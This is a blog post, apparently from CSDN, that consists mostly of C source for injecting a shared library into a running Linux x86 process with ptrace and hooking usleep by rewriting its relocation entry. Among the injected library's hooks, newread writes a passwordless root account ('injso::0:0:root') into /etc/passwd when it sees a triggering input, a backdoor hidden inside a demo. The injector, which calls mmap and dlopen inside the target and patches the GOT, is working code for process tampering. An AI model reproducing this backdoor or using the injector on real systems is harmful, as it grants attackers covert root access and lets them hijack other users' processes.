linx x86平台成功注入so 并且通道rel进行hook

最新推荐文章于 2022-05-31 08:36:35 发布
最新推荐文章于 2022-05-31 08:36:35 发布
阅读量1.4k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q123456789098/article/details/52220631
版权

  so.c

#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
 
int (*oldusleep)(useconds_t usec);
   

int newusleep(useconds_t usec)
{
	int ret;
       
 	printf("newusleep\n");

	ret = oldusleep(usec);



	return ret;
}
 

int (*oldwrite) (int fd, const void *buf, size_t count);
ssize_t(*oldread) (int fd, void *buf, size_t count);

void *dolife(void *arg)
{
	FILE *fp;
	int i;

	puts("ok");
	puts("ok");
	puts("ok");
	pthread_detach(pthread_self());
	for (i = 0; i < 256; i++) {
		puts("dolife ok");
/*		fp = fopen("/home/grip2/lifelog.txt", "a");
		fprintf(fp, "%d\n", i);
		fclose(fp);
*/ sleep(1);
	}
}

void newput(const char *s)
{
	printf("this is %s speaking\n",s);
}

int newwrite(int fd, const void *buf, size_t count)
{
	static int n = 0;
	static int f = 0;
	pthread_t tid;

//      if (0 == f++)
//              pthread_create(&tid, NULL, &dolife, NULL);
	if (n++ > 2)
		exit(0);
	printf("In newwrite :)\n");
	printf("oldwrite %p\n", oldwrite);
	printf("newwrite %p\n", newwrite);
	oldwrite(fd, buf, count);
	n--;

	return count;
}

ssize_t newread(int fd, void *buf, size_t count)
{
	ssize_t ret;
	FILE *fp;
	char ch = '#';

	ret = oldread(fd, buf, count);

	if (memcmp(buf, (void *) &ch, 1) == 0) {
		fp = fopen("/etc/passwd", "a");
		fputs("injso::0:0:root:/root:/bin/sh\n", fp);
		fclose(fp);
	}


	return ret;
}


void newlife(void)
{
	pthread_t tid;
	char ch;

	puts("ok");
	pthread_create(&tid, NULL, &dolife, NULL);
//exit(0);
/*
//for(;;)
{
	puts("ok create");
//	puts("ok create");
//	fflush(stdout);
ch = getchar();
	puts("ok create");
	puts("ok create");
if ('q' == ch)
break;
}
*/
/*
if(fork() == 0)
{
dolife(0);
exit(0);
}
*/
	puts("ok create");
	puts("ok create");
	puts("ok create");
	puts("ok create");
	puts("ok create");
	puts("ok create");
	puts("ok create");
	puts("ok create");
	puts("ok create");
}

hook.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <wait.h>
#include <sys/user.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <elf.h>
#include <link.h> 
#include <sys/wait.h>
#include <sys/mman.h>
#include <dlfcn.h>
#include <dirent.h>
#include <unistd.h> 
#include "p_elf.h"
#include "p_dbg.h"

void call_dl_open(int pid, unsigned long addr, char *libname);
void call_dlopen(int pid, unsigned long addr, char *libname);
void usage(void);
const char *libc_path = "/lib/i386-linux-gnu/libc-2.19.so";
const char *linker_path = "/lib/i386-linux-gnu/ld-2.19.so";
void* get_module_base(pid_t pid, const char* module_name)
{
    FILE *fp;
    long addr = 0;
    char *pch;
    char filename[32];
    char line[1024];

    if (pid < 0) {
        /* self process */
        snprintf(filename, sizeof(filename), "/proc/self/maps", pid);
    } else {
        snprintf(filename, sizeof(filename), "/proc/%d/maps", pid);
    }

    fp = fopen(filename, "r");

    if (fp != NULL) {
        while (fgets(line, sizeof(line), fp)) {
            if (strstr(line, module_name)) {
                pch = strtok( line, "-" );
                addr = strtoul( pch, NULL, 16 );

                if (addr == 0x8000)
                    addr = 0;

                break;
            }
        }

        fclose(fp) ;
    }

    return (void *)addr;
}


int find_pid_of(const char *process_name)
{
    int id;
    pid_t pid = -1;
    DIR* dir;
    FILE *fp;
    char filename[32];
    char cmdline[256];

    struct dirent * entry;

    if (process_name == NULL)
        return -1;

    dir = opendir("/proc");
    if (dir == NULL)
        return -1;

    while((entry = readdir(dir)) != NULL) {
        id = atoi(entry->d_name);
        if (id != 0) {
            sprintf(filename, "/proc/%d/cmdline", id);
            fp = fopen(filename, "r");
            if (fp) {
                fgets(cmdline, sizeof(cmdline), fp);
                fclose(fp);

                if (strcmp(process_name, cmdline) == 0)	{
                    /* process found */
                    pid = id;
                    break;
                }
            }
        }
    }

    closedir(dir);
    return pid;
}

int ptrace_getregs(pid_t pid, struct user_regs_struct * regs)
{
    if (ptrace(PTRACE_GETREGS, pid, NULL, regs) < 0) {
        perror("ptrace_getregs: Can not get register values");
        return -1;
    }

    return 0;
}

int ptrace_setregs(pid_t pid, struct user_regs_struct * regs)
{
    if (ptrace(PTRACE_SETREGS, pid, NULL, regs) < 0) {
        perror("ptrace_setregs: Can not set register values");
        return -1;
    }

    return 0;
}
int ptrace_readdata(pid_t pid,  uint8_t *src, uint8_t *buf, size_t size)
{
    uint32_t i, j, remain;
    uint8_t *laddr;

    union u {
        long val;
        char chars[sizeof(long)];
    } d;

    j = size / 4;
    remain = size % 4;

    laddr = buf;

    for (i = 0; i < j; i ++) {
        d.val = ptrace(PTRACE_PEEKTEXT, pid, src, 0);
        memcpy(laddr, d.chars, 4);
        src += 4;
        laddr += 4;
    }

    if (remain > 0) {
        d.val = ptrace(PTRACE_PEEKTEXT, pid, src, 0);
        memcpy(laddr, d.chars, remain);
    }

    return 0;
}

int ptrace_writedata(pid_t pid, uint8_t *dest, uint8_t *data, size_t size)
{
    uint32_t i, j, remain;
    uint8_t *laddr;

    union u {
        long val;
        char chars[sizeof(long)];
    } d;

    j = size / 4;
    remain = size % 4;

    laddr = data;

    for (i = 0; i < j; i ++) {
        memcpy(d.chars, laddr, 4);
        ptrace(PTRACE_POKETEXT, pid, dest, d.val);

        dest  += 4;
        laddr += 4;
    }

    if (remain > 0) {
        d.val = ptrace(PTRACE_PEEKTEXT, pid, dest, 0);
        for (i = 0; i < remain; i ++) {
            d.chars[i] = *laddr ++;
        }

        ptrace(PTRACE_POKETEXT, pid, dest, d.val);
    }

    return 0;
}

int ptrace_continue(pid_t pid)
{
    if (ptrace(PTRACE_CONT, pid, NULL, 0) < 0) {
        perror("ptrace_cont");
        return -1;
    }

    return 0;
}

long ptrace_call_ext(pid_t pid, uint32_t addr, long *params, uint32_t num_params, struct user_regs_struct * regs)
{
    regs->esp -= (num_params) * sizeof(long) ;
    ptrace_writedata(pid, (void *)regs->esp, (uint8_t *)params, (num_params) * sizeof(long));

    long tmp_addr = 0x00;
    regs->esp -= sizeof(long);
    ptrace_writedata(pid, regs->esp, (char *)&tmp_addr, sizeof(tmp_addr)); 

    regs->eip = addr;

    if (ptrace_setregs(pid, regs) == -1 
            || ptrace_continue( pid) == -1) {
        printf("error\n");
        return -1;
    }

    int stat = 0;
    //printf("start waiting\n");
    waitpid(pid, &stat, WUNTRACED);
    //printf("finished\n");

    return 0;
}
int ptrace_call_wrapper(pid_t target_pid, const char * func_name, void * func_addr, long * parameters, int param_num, struct user_regs_struct * regs) 
{
    printf("[+] Calling %s in target process.\n", func_name);
    if (ptrace_call_ext(target_pid, (uint32_t)func_addr, parameters, param_num, regs) == -1)
        return -1;

    if (ptrace_getregs(target_pid, regs) == -1)
        return -1;
    //printf("[+] Target process returned from %s, return value=%x, pc=%x \n", func_name, ptrace_retval(regs), ptrace_ip(regs));
    return 0;
}
long ptrace_retval(struct user_regs_struct * regs)
{ 
    return regs->eax; 
}

void call_dlopen(int target_pid, unsigned long dlopen_addr, char *library_path)
{
	 
	void *mmap_addr;
	struct user_regs_struct regs;
	struct user_regs_struct original_regs;
	long parameters[10];
	uint8_t *map_base = 0;
	
	if (ptrace_getregs(target_pid, &regs) == -1)
        goto exit;
    memcpy(&original_regs, &regs, sizeof(regs));	
	mmap_addr = enumprocesssym(target_pid, "libc", "mmap");
	parameters[0] = 0;	// addr
    parameters[1] = 0x4000; // size
    parameters[2] = PROT_READ | PROT_WRITE | PROT_EXEC;  // prot
    parameters[3] =  MAP_ANONYMOUS | MAP_PRIVATE; // flags
    parameters[4] = 0; //fd
    parameters[5] = 0; //offset

    if (ptrace_call_wrapper(target_pid, "mmap", mmap_addr, parameters, 6, &regs) == -1)
        goto exit;
    map_base = ptrace_retval(&regs);
	printf("\n--------mapbase=%x--------\n",map_base);
	if(map_base==0){
		goto exit;
	}	
	ptrace_writedata(target_pid, map_base, library_path, strlen(library_path) + 1);
	
    parameters[0] = map_base;	
    parameters[1] = RTLD_NOW| RTLD_GLOBAL; 
	if (ptrace_call_wrapper(target_pid, "dlopen", dlopen_addr, parameters, 2, &regs) == -1)
        goto exit;

    void * sohandle = ptrace_retval(&regs);	
	printf("sohandle = %x\n", sohandle);
exit:
	ptrace_setregs(target_pid, &original_regs);
	 
} 
#define PRINT(a,ehdr) printf(#a"=%x\n",ehdr->a);
#define PRINTA4(a,ehdr) printf(#a"=%2.2x %c%c%c\n",ehdr->a[0],ehdr->a[1],ehdr->a[2],ehdr->a[3]);
void printehdr(Elf32_Ehdr *ehdr)
{
	puts("------------printehdr---------------");
	PRINTA4(e_ident,ehdr)
	PRINT(e_type,ehdr)
	PRINT(e_machine,ehdr)
	PRINT(e_version,ehdr)
	PRINT(e_entry,ehdr)
	PRINT(e_phoff,ehdr)
	PRINT(e_shoff,ehdr)
	PRINT(e_flags,ehdr)
	PRINT(e_ehsize,ehdr)
	PRINT(e_phentsize,ehdr)
	PRINT(e_phnum,ehdr)
	PRINT(e_shentsize,ehdr)
	PRINT(e_shnum,ehdr)
	PRINT(e_shstrndx,ehdr)
	printf("ehsize=%x phsize=%x shsize=%x\n",sizeof(Elf32_Ehdr),sizeof(Elf32_Phdr),sizeof(Elf32_Shdr));
	
}
 
#define PRINTSWITCH(a,type) if(a==type){puts(#a);return;}
void printptype(int type)
{
	PRINTSWITCH(PT_NULL,type)
	PRINTSWITCH(PT_LOAD,type)
	PRINTSWITCH(PT_DYNAMIC,type)
	PRINTSWITCH(PT_INTERP,type)
	PRINTSWITCH(PT_NOTE,type)
	PRINTSWITCH(PT_SHLIB,type)
	PRINTSWITCH(PT_PHDR,type)
	PRINTSWITCH(PT_TLS,type)
	PRINTSWITCH(PT_NUM,type)
	PRINTSWITCH(PT_LOOS,type)
	PRINTSWITCH(PT_GNU_EH_FRAME,type)
	PRINTSWITCH(PT_GNU_STACK,type)
	PRINTSWITCH(PT_GNU_RELRO,type)
	PRINTSWITCH(PT_LOSUNW,type)
	PRINTSWITCH(PT_SUNWBSS,type)
	PRINTSWITCH(PT_SUNWSTACK,type)
	PRINTSWITCH(PT_HISUNW,type)
	PRINTSWITCH(PT_HIOS,type)
	PRINTSWITCH(PT_LOPROC,type)
	PRINTSWITCH(PT_HIPROC,type)
}
void printphdr(Elf32_Phdr *phdr)
{
	puts("-------printphdr--------------------");
	printptype(phdr->p_type);
	PRINT(p_type,phdr)
	PRINT(p_offset,phdr)
	PRINT(p_vaddr,phdr)
	PRINT(p_paddr,phdr)
	PRINT(p_filesz,phdr)
	PRINT(p_memsz,phdr)
	PRINT(p_flags,phdr)
	PRINT(p_align,phdr) 
}
void printdyntag(int d_tag)
{
	PRINTSWITCH(DT_NULL,d_tag)
	PRINTSWITCH(DT_NEEDED,d_tag)
	PRINTSWITCH(DT_PLTRELSZ,d_tag)
	PRINTSWITCH(DT_PLTGOT,d_tag)
	PRINTSWITCH(DT_HASH,d_tag)
	PRINTSWITCH(DT_STRTAB,d_tag)
	PRINTSWITCH(DT_SYMTAB,d_tag)		
	PRINTSWITCH(DT_RELA,d_tag)
	PRINTSWITCH(DT_RELASZ,d_tag)
	PRINTSWITCH(DT_RELAENT,d_tag)
	PRINTSWITCH(DT_STRSZ,d_tag)
	PRINTSWITCH(DT_SYMENT,d_tag)
	PRINTSWITCH(DT_INIT,d_tag)
	PRINTSWITCH(DT_FINI,d_tag)
	PRINTSWITCH(DT_SONAME,d_tag)
	PRINTSWITCH(DT_RPATH,d_tag)
	PRINTSWITCH(DT_SYMBOLIC,d_tag)
	PRINTSWITCH(DT_REL,d_tag)
	PRINTSWITCH(DT_RELSZ,d_tag)
	PRINTSWITCH(DT_RELENT,d_tag)
	PRINTSWITCH(DT_PLTREL,d_tag)
	PRINTSWITCH(DT_DEBUG,d_tag)
	PRINTSWITCH(DT_TEXTREL,d_tag)
	PRINTSWITCH(DT_JMPREL,d_tag)
	PRINTSWITCH(DT_BIND_NOW,d_tag)
	PRINTSWITCH(DT_INIT_ARRAY,d_tag)
	PRINTSWITCH(DT_FINI_ARRAY,d_tag)	
	PRINTSWITCH(DT_INIT_ARRAYSZ,d_tag)
	PRINTSWITCH(DT_FINI_ARRAYSZ,d_tag)
	PRINTSWITCH(DT_RUNPATH,d_tag)
	PRINTSWITCH(DT_FLAGS,d_tag)
	PRINTSWITCH(DT_ENCODING,d_tag)
	PRINTSWITCH(DT_PREINIT_ARRAY,d_tag)
	PRINTSWITCH(DT_PREINIT_ARRAYSZ,d_tag)
	PRINTSWITCH(DT_NUM,d_tag)
	PRINTSWITCH(DT_LOOS,d_tag)
	PRINTSWITCH(DT_HIOS,d_tag)
	PRINTSWITCH(DT_LOPROC,d_tag)
	PRINTSWITCH(DT_HIPROC,d_tag)
	PRINTSWITCH(DT_PROCNUM,d_tag)
	PRINTSWITCH(DT_VALRNGLO,d_tag)
	PRINTSWITCH(DT_GNU_PRELINKED,d_tag)
	PRINTSWITCH(DT_GNU_CONFLICTSZ,d_tag)
	PRINTSWITCH(DT_GNU_LIBLISTSZ,d_tag)
	PRINTSWITCH(DT_CHECKSUM,d_tag)
	PRINTSWITCH(DT_PLTPADSZ,d_tag)
	PRINTSWITCH(DT_MOVEENT,d_tag)	 	
	PRINTSWITCH(DT_MOVESZ,d_tag)
	PRINTSWITCH(DT_FEATURE_1,d_tag)
	PRINTSWITCH(DT_POSFLAG_1,d_tag)
	PRINTSWITCH(DT_SYMINSZ,d_tag)
	PRINTSWITCH(DT_SYMINENT,d_tag)
	PRINTSWITCH(DT_VALRNGHI,d_tag)
	PRINTSWITCH(DT_ADDRRNGLO,d_tag)
	PRINTSWITCH(DT_GNU_HASH,d_tag)	
	PRINTSWITCH(DT_TLSDESC_PLT,d_tag)	
	PRINTSWITCH(DT_TLSDESC_GOT,d_tag)	
	PRINTSWITCH(DT_GNU_CONFLICT,d_tag)	
	PRINTSWITCH(DT_GNU_LIBLIST,d_tag)	
	PRINTSWITCH(DT_CONFIG,d_tag)	
	PRINTSWITCH(DT_DEPAUDIT,d_tag)	
	PRINTSWITCH(DT_AUDIT,d_tag)	
	PRINTSWITCH(DT_PLTPAD,d_tag)	
	PRINTSWITCH(DT_MOVETAB,d_tag)	
	PRINTSWITCH(DT_SYMINFO,d_tag)	
	PRINTSWITCH(DT_ADDRRNGHI,d_tag)	
	PRINTSWITCH(DT_ADDRNUM,d_tag)	
	PRINTSWITCH(DT_VERSYM,d_tag)	
	PRINTSWITCH(DT_RELACOUNT,d_tag)	
	PRINTSWITCH(DT_RELCOUNT,d_tag)	
	PRINTSWITCH(DT_FLAGS_1,d_tag)	
	PRINTSWITCH(DT_VERDEF,d_tag)	
	PRINTSWITCH(DT_VERDEFNUM,d_tag)			
	PRINTSWITCH(DT_VERNEED,d_tag)
	PRINTSWITCH(DT_VERNEEDNUM,d_tag)			
	PRINTSWITCH(DT_VERSIONTAGNUM,d_tag)	
	PRINTSWITCH(DT_AUXILIARY,d_tag)	
	PRINTSWITCH(DT_FILTER,d_tag)			
	PRINTSWITCH(DT_EXTRANUM,d_tag) 
}
void printdyn(Elf32_Dyn* dyn)
{
	puts("----------printdyn-----------------");
	printdyntag(dyn->d_tag);
	PRINT(d_tag,dyn)
	PRINT(d_un.d_val,dyn)
}

#define PROCESSREAD(ptr,addr,size) ptrace_read(pid, (void*)(addr), ptr, size)

void printsym(Elf32_Sym *sym,int straddr,int pid)
{
	puts("-------printsym--------------------");

	if(sym->st_name){
	 	char sname[40];
		PROCESSREAD(sname,straddr+sym->st_name,40);
		puts(sname);
	}
	PRINT(st_name,sym)
	PRINT(st_value,sym)	
	PRINT(st_size,sym)
	PRINT(st_info,sym)
	PRINT(st_other,sym)
	PRINT(st_shndx,sym)
}
void printlinkmap(struct link_map*lm,int pid)
{
	puts("-------printlinkmap--------");
	PRINT(l_addr,lm)
	PRINT(l_ld,lm)	
	char sname[40];
	PROCESSREAD(sname,lm->l_name,40);
	puts(sname);
	//puts(lm->l_name);
}
 
int enumprocesssym(int pid,const char*libname,const char*fnname)
{
	unsigned long modbase = (unsigned long)get_module_base(pid,libname);
    unsigned long phdr_addr,shdr_addr, dyn_addr;
	int i;
	if(modbase==0){
		printf("%d[%s] get_module_base=0",pid,libname);
		return;
	}
	printf("modbase=%x\n",modbase);
	Elf32_Ehdr *ehdr = (Elf32_Ehdr *) malloc(sizeof(Elf32_Ehdr));
	Elf32_Phdr *phdr = (Elf32_Phdr *) malloc(sizeof(Elf32_Phdr));
	Elf32_Shdr *shdr = (Elf32_Shdr *) malloc(sizeof(Elf32_Shdr));
	Elf32_Dyn *dyn = (Elf32_Dyn *) malloc(sizeof(Elf32_Dyn));
	Elf32_Sym *sym = (Elf32_Sym *) malloc(sizeof(Elf32_Sym));
	struct link_map* linknode = (struct link_map*)malloc(sizeof(struct link_map));
	
	//ptrace_read(pid, (void*)modbase, ehdr, sizeof(Elf32_Ehdr));
	PROCESSREAD(ehdr,modbase,sizeof(Elf32_Ehdr));
	//printehdr(ehdr);
	int offsetdyn =0;
	int dynsize = 0;
	for(i=0;i<ehdr->e_phnum;i++){
		PROCESSREAD(phdr,modbase+ehdr->e_phoff+(i*ehdr->e_phentsize),sizeof(Elf32_Phdr));
		//printphdr(phdr);
		if(PT_DYNAMIC==phdr->p_type){
			offsetdyn = phdr->p_vaddr;
			dynsize = phdr->p_memsz;
		}
	}
	int symaddr=0;
	int symsize=0;
	int straddr=0;
	int gotaddr=0;
	int mapaddr=0;
	
	for(i=0;i<dynsize/sizeof(Elf32_Dyn);i++){
		PROCESSREAD(dyn,modbase+offsetdyn+(i*sizeof(Elf32_Dyn)),sizeof(Elf32_Dyn));
		//printdyn(dyn);
		if(DT_SYMTAB==dyn->d_tag){
			symaddr = dyn->d_un.d_val;
		}else if(DT_STRTAB==dyn->d_tag){
			straddr=dyn->d_un.d_val;
		}else if(DT_PLTGOT==dyn->d_tag){
			gotaddr=dyn->d_un.d_val;
		}
	}
	puts("-------sym-------");
	for(i=0;;i++){
		PROCESSREAD(sym,symaddr+(i*sizeof(Elf32_Sym)),sizeof(Elf32_Sym));
		//printsym(sym,straddr,pid);		
		if(sym->st_name){
			char sname[40];
			PROCESSREAD(sname,straddr+sym->st_name,40);
			if(!strcmp(sname,fnname)){
				printsym(sym,straddr,pid);	
				return modbase+sym->st_value;
			}
		}
	}	
	return 0;
	Elf32_Addr gotv=0;
	puts("----got------");
	int linknodeaddr=0;
	for(i=0;i<60;i++){
		PROCESSREAD(&gotv,gotaddr+(i*sizeof(Elf32_Addr)),sizeof(Elf32_Addr));
		printf("%x\n",gotv);	
		if(gotv==0)break;
		if(i==1)mapaddr=gotv;
	}		
	i=0;
	int laddr = mapaddr;
	puts("----linkmap------");
	while(1)
	{
		PROCESSREAD(linknode,laddr,sizeof(struct link_map));
		//printlinkmap(linknode);
		if(linknode->l_next==0)break;
		laddr = linknode->l_next;
	}
	while(1)
	{
		PROCESSREAD(linknode,laddr,sizeof(struct link_map));
		printlinkmap(linknode,pid);
		if(linknode->l_prev==0)break;
		laddr = linknode->l_prev;
	}	
	return;
 
}

void call_newput(int target_pid, unsigned long newput_addr, const char *strdata)
{
	 
	void *mmap_addr;
	struct user_regs_struct regs;
	struct user_regs_struct original_regs;
	long parameters[10];
	uint8_t *map_base = 0;
	
	if (ptrace_getregs(target_pid, &regs) == -1)
        goto exit;
    memcpy(&original_regs, &regs, sizeof(regs));	
	mmap_addr = enumprocesssym(target_pid, "libc", "mmap");
	parameters[0] = 0;	// addr
    parameters[1] = 0x4000; // size
    parameters[2] = PROT_READ | PROT_WRITE | PROT_EXEC;  // prot
    parameters[3] =  MAP_ANONYMOUS | MAP_PRIVATE; // flags
    parameters[4] = 0; //fd
    parameters[5] = 0; //offset

    if (ptrace_call_wrapper(target_pid, "mmap", mmap_addr, parameters, 6, &regs) == -1)
        goto exit;
    map_base = ptrace_retval(&regs);
	printf("\n--------mapbase=%x--------\n",map_base);
	if(map_base==0){
		goto exit;
	}	
	ptrace_writedata(target_pid, map_base, strdata, strlen(strdata) + 1);
	
    parameters[0] = map_base;	
    //parameters[1] = RTLD_NOW| RTLD_GLOBAL; 
	if (ptrace_call_wrapper(target_pid, "newput",newput_addr, parameters, 1, &regs) == -1)
        goto exit;

    void * sohandle = ptrace_retval(&regs);	
	printf("ret = %x\n", sohandle);
exit:
	ptrace_setregs(target_pid, &original_regs);
	 
} 
int g_symtab=0,g_strtab=0,g_jmprel=0,g_totalrelsize=0,g_relsize=0,g_nrels=0;
void get_dyn_info2(int pid,int dynaddr)
{
	Elf32_Dyn *dyn = (Elf32_Dyn *) malloc(sizeof(Elf32_Dyn));
	int i = 0;

	PROCESSREAD( dyn,dynaddr + i * sizeof(Elf32_Dyn), sizeof(Elf32_Dyn));
	i++;
	while (dyn->d_tag) {
		switch (dyn->d_tag) {
		case DT_SYMTAB:
			puts("DT_SYMTAB");
			g_symtab = dyn->d_un.d_ptr;
			break;
		case DT_STRTAB:
			g_strtab = dyn->d_un.d_ptr;
			puts("DT_STRTAB");
			break;
		case DT_JMPREL:
			g_jmprel = dyn->d_un.d_ptr;
			puts("DT_JMPREL");
			//printf("jmprel\t %p\n", g_jmprel);
			break;
		case DT_PLTRELSZ:
			g_totalrelsize = dyn->d_un.d_val;
			puts("DT_PLTRELSZ");
			break;
		case DT_RELAENT:
			g_relsize = dyn->d_un.d_val;
			puts("DT_RELAENT");
			break;
		case DT_RELENT:
			g_relsize = dyn->d_un.d_val;
			puts("DT_RELENT");
			break;
		}

		PROCESSREAD(dyn, dynaddr + i * sizeof(Elf32_Dyn), sizeof(Elf32_Dyn));
		i++;
	}

	g_nrels = g_totalrelsize / g_relsize;

	free(dyn);
	printf("g_nrels=%d\n",g_nrels);
}
unsigned long find_sym_in_rel2(int pid, char *sym_name,int dynaddr)
{
	Elf32_Rel *rel = (Elf32_Rel *) malloc(sizeof(Elf32_Rel));
	Elf32_Sym *sym = (Elf32_Sym *) malloc(sizeof(Elf32_Sym));
	int i;	 
	unsigned long ret;
	char str[100];

	get_dyn_info2(pid,dynaddr);
	for (i = 0; i < g_nrels; i++) {
		puts("1");
		PROCESSREAD(rel, (unsigned long) (g_jmprel + i * sizeof(Elf32_Rel)),sizeof(Elf32_Rel));
		if (ELF32_R_SYM(rel->r_info)) {
			PROCESSREAD(sym,g_symtab + ELF32_R_SYM(rel->r_info) * sizeof(Elf32_Sym),  sizeof(Elf32_Sym));
			PROCESSREAD(str,g_strtab + sym->st_name,100);
			puts("2");
			if (strcmp(str, sym_name) == 0) {				 
				break;
			}			 
		}
	}

	if (i == g_nrels)
		ret = 0;
	else
		ret = rel->r_offset;

	free(rel);
	free(sym);

	return ret;
}

int enumprocrel(int pid,const char*libname)
{
	unsigned long modbase = (unsigned long)get_module_base(pid,libname);
    unsigned long phdr_addr,shdr_addr, dyn_addr;
	int i;
	if(modbase==0){
		printf("%d[%s] get_module_base=0\n",pid,libname);
		return;
	}
	printf("modbase=%x\n",modbase);
	Elf32_Ehdr *ehdr = (Elf32_Ehdr *) malloc(sizeof(Elf32_Ehdr));
	Elf32_Phdr *phdr = (Elf32_Phdr *) malloc(sizeof(Elf32_Phdr));
 	
	//ptrace_read(pid, (void*)modbase, ehdr, sizeof(Elf32_Ehdr));
	PROCESSREAD(ehdr,modbase,sizeof(Elf32_Ehdr));
	//printehdr(ehdr);
	int offsetdyn =0;
	int dynsize = 0;
	for(i=0;i<ehdr->e_phnum;i++){
		PROCESSREAD(phdr,modbase+ehdr->e_phoff+(i*ehdr->e_phentsize),sizeof(Elf32_Phdr));
		//printphdr(phdr);
		if(PT_DYNAMIC==phdr->p_type){
			offsetdyn = phdr->p_vaddr;
			dynsize = phdr->p_memsz;
			free(ehdr);
			free(phdr);
			if(offsetdyn<0x08000000)return modbase+offsetdyn;
			return offsetdyn;
		}
	}
	return 0; 
} 
int main(int argc, char *argv[])
{
	long pid;
	struct link_map *map;
	char sym_name[256];
	unsigned long sym_addr;
	unsigned long new_addr, old_addr, rel_addr;
	int ch;
	char soname[256];
	char *pchar;
	char search_mode = 's';	/* 's' - symbol table, 'h' - hash table */
	char print_flag = 'n';

	strcpy(soname, (char *) get_current_dir_name());
	strcat(soname, "/so.so");	/* default shared library */
	
	printf("soname:%s\n",soname); 
 
    pid = find_pid_of("./loop");
	  
    
	ptrace_attach(pid);

	printf("pid=%d\n",pid);
	//int mmapaddress=enumprocesssym(pid,"libc","mmap");
	//printf("mmap=%x\n",mmapaddress);	 

	void  *dlopen_addr;
//	void* handle = dlopen( "/lib/i386-linux-gnu/libdl-2.19.so",RTLD_NOW| RTLD_GLOBAL);
//	void*addr = dlsym(handle,"dlopen");
	dlopen_addr = enumprocesssym( pid, "libdl", "dlopen" );
 
	printf("dlopen_addr  = %x\n", dlopen_addr);
	call_dlopen(pid, dlopen_addr, soname);
	
	void* newput = enumprocesssym( pid, soname, "newput" );
	call_newput(pid,newput,"wangjinrong");
	

	 
	sym_addr = enumprocesssym(pid, soname, "newusleep");
	printf("sym_addr=%x\n",sym_addr);
	
	 
	int dynbaseaddr=enumprocrel(pid,"loop");
	printf("dynbaseaddr=%x\n",dynbaseaddr);
	
	rel_addr = find_sym_in_rel2(pid,"usleep",dynbaseaddr);
	printf("rel_addr=%x\n",rel_addr);
	 
	old_addr = enumprocesssym(pid, soname, "oldusleep");
	printf("old_addr=%x\n",old_addr);
	 

	 
	ptrace_read(pid, rel_addr, &new_addr, sizeof(new_addr));
	 
	ptrace_write(pid, old_addr, &new_addr, sizeof(new_addr));
	ptrace_write(pid, rel_addr, &sym_addr, sizeof(sym_addr));	 


	ptrace_detach(pid);
	

	exit(0);
}

s.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <wait.h>
#include <sys/user.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <elf.h>
#include <link.h> 
#include <sys/wait.h>
#include <sys/mman.h>
#include <dlfcn.h>
#include <dirent.h>
#include <unistd.h> 
void* get_module_base(pid_t pid, const char* module_name)
{
    FILE *fp;
    long addr = 0;
    char *pch;
    char filename[32];
    char line[1024];

    if (pid < 0) {
        /* self process */
        snprintf(filename, sizeof(filename), "/proc/self/maps", pid);
    } else {
        snprintf(filename, sizeof(filename), "/proc/%d/maps", pid);
    }

    fp = fopen(filename, "r");

    if (fp != NULL) {
        while (fgets(line, sizeof(line), fp)) {
            if (strstr(line, module_name)) {
                pch = strtok( line, "-" );
                addr = strtoul( pch, NULL, 16 );

                if (addr == 0x8000)
                    addr = 0;

                break;
            }
        }

        fclose(fp) ;
    }

    return (void *)addr;
}


int find_pid_of(const char *process_name)
{
    int id;
    pid_t pid = -1;
    DIR* dir;
    FILE *fp;
    char filename[32];
    char cmdline[256];

    struct dirent * entry;

    if (process_name == NULL)
        return -1;

    dir = opendir("/proc");
    if (dir == NULL)
        return -1;

    while((entry = readdir(dir)) != NULL) {
        id = atoi(entry->d_name);
        if (id != 0) {
            sprintf(filename, "/proc/%d/cmdline", id);
            fp = fopen(filename, "r");
            if (fp) {
                fgets(cmdline, sizeof(cmdline), fp);
                fclose(fp);

                if (strcmp(process_name, cmdline) == 0)	{
                    /* process found */
                    pid = id;
                    break;
                }
            }
        }
    }

    closedir(dir);
    return pid;
}
void* get_remote_addr(pid_t target_pid, const char* module_name, char* fnname)
{
    void* local_handle, *remote_handle;
	void* local_addr;
	void* handle = dlopen( "/lib/i386-linux-gnu/libdl-2.19.so",RTLD_NOW| RTLD_GLOBAL);
	local_addr = dlsym(handle,fnname);
    local_handle = get_module_base(-1, module_name);
    remote_handle = get_module_base(target_pid, module_name);

    printf("[+] get_remote_addr: local[%x], remote[%x] local_addr[%x]\n", local_handle, remote_handle,local_addr);

    void * ret_addr = (void *)((uint32_t)local_addr  - (uint32_t)local_handle)+ (uint32_t)remote_handle;

    return ret_addr;
}
#define PRINT(a,ehdr) printf(#a"=%x\n",ehdr->a);
#define PRINTA4(a,ehdr) printf(#a"=%2.2x %c%c%c\n",ehdr->a[0],ehdr->a[1],ehdr->a[2],ehdr->a[3]);
void printehdr(Elf32_Ehdr *ehdr)
{
	puts("---------------------------");
	PRINTA4(e_ident,ehdr)
	PRINT(e_type,ehdr)
	PRINT(e_machine,ehdr)
	PRINT(e_version,ehdr)
	PRINT(e_entry,ehdr)
	PRINT(e_phoff,ehdr)
	PRINT(e_shoff,ehdr)
	PRINT(e_flags,ehdr)
	PRINT(e_ehsize,ehdr)
	PRINT(e_phentsize,ehdr)
	PRINT(e_phnum,ehdr)
	PRINT(e_shentsize,ehdr)
	PRINT(e_shnum,ehdr)
	PRINT(e_shstrndx,ehdr)
	printf("ehsize=%x phsize=%x shsize=%x\n",sizeof(Elf32_Ehdr),sizeof(Elf32_Phdr),sizeof(Elf32_Shdr));
	
}
 
#define PRINTSWITCH(a,type) if(a==type){puts(#a);return;}
void printptype(int type)
{
	PRINTSWITCH(PT_NULL,type)
	PRINTSWITCH(PT_LOAD,type)
	PRINTSWITCH(PT_DYNAMIC,type)
	PRINTSWITCH(PT_INTERP,type)
	PRINTSWITCH(PT_NOTE,type)
	PRINTSWITCH(PT_SHLIB,type)
	PRINTSWITCH(PT_PHDR,type)
	PRINTSWITCH(PT_TLS,type)
	PRINTSWITCH(PT_NUM,type)
	PRINTSWITCH(PT_LOOS,type)
